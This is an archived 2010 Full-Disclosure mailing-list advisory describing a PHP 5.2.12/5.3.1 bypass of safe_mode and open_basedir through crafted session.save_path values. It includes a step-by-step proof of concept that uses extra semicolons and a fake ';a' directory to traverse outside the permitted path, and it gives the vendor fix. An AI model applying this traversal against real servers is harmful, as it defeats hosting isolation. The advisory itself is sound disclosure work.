[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <4B73E83B.50609@securityreason.com>
Date: Thu, 11 Feb 2010 12:21:31 +0100
From: Maksymilian Arciemowicz <cxib@...urityreason.com>
To: full-disclosure@...ts.grok.org.uk
Subject: PHP 5.2.12/5.3.1 session.save_path safe_mode and
open_basedir bypass
[ PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass ]
Credit: Grzegorz Stachowiak
Provided by: SecurityReason.com
Date:
- Written: 31.01.2010
- Public: 11.02.2010
SecurityRisk: Medium
Affected Software:
PHP 5.2.12
PHP 5.3.1
Advisory URL: http://securityreason.com/achievement_securityalert/82
Vendor: http://www.php.net
--- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.
A visitor accessing your web site is assigned a unique id, the so-called
session id. This is either stored in a cookie on the user side or is
propagated in the URL.
session.save_path defines the argument which is passed to the save
handler. If you choose the default files handler, this is the path where
the files are created. Defaults to /tmp. See also session_save_path().
There is an optional N argument to this directive that determines the
number of directory levels your session files will be spread around in.
For example, setting to '5;/tmp' may end up creating a session file and
location like /tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If .
In order to use N you must create all of these directories before use. A
small shell script exists in ext/session to do this, it's called
mod_files.sh. Also note that if N is used and greater than 0 then
automatic garbage collection will not be performed, see a copy of
php.ini for further information. Also, if you use N, be sure to surround
session.save_path in "quotes" because the separator (;) is also used for
comments in php.ini.
---- 1. session.save_path safe mode and open basedir bypass ---
session.save_path can be set via ini_set(), session_save_path()
functions. In session.save_path there should be path where you will save
yours tmp files. But syntax for session.save_path is:
[/PATH]
OR
[N;/PATH]
N - can be also a string (N should be numeric).
EXAMPLES:
1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")
The main problem came when we use multiple ';' character and when we
will create fake directory structure to reduce '../'.
Proof of Concept:
0. Create directories:
/humhum
and
/byp
1. set open_basedir = /byp
2. create test.php
{
session_save_path("/humhum");
session_start();
}
3. php test.php
Warning: session_save_path(): open_basedir restriction in effect.
File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php
on line 3
4. subdir.php
{
mkdir("puf");
mkdir(";a");
}
5. php subdir.php
6. cd puf
7. create byp.php
{
session_save_path(";;/byp/;a/../../humhum");
session_start();
}
8. php byp.php
9. ls /humhum
sess_d905eb71c9ad65ce2a845cdb0fed3016
The main problem is located in session.c. PHP doesn't check, that we
have used next ';' after first. Creating fake directory structure
mkdir ';a'
mkdir '../;a'
we can reduce directory level using '../' .
--- 2. Fix ---
Revision 294272
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/session/session.c?view=log
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/session/session.c?view=log
--- 3. Credit ---
Founded by: Grzegorz Stachowiak
Written by: Maksymilian Arciemowicz
Fixed by : Ilia Alshanetsky
--- 4. Contact ---
Email:
- Grzegorz.Stachowiak
stachowiak [a,t} analogicode (d_0t} pl
- Maksymilian Arciemowicz
cxib {a.t] securityreason [d0_t} com
GPG:
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://securityreason.com/exploit_alert/ - Exploit Database
http://securityreason.com/security_alert/ - Vulnerability Database
Download attachment "signature.asc" of type "application/pgp-signature" (164 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists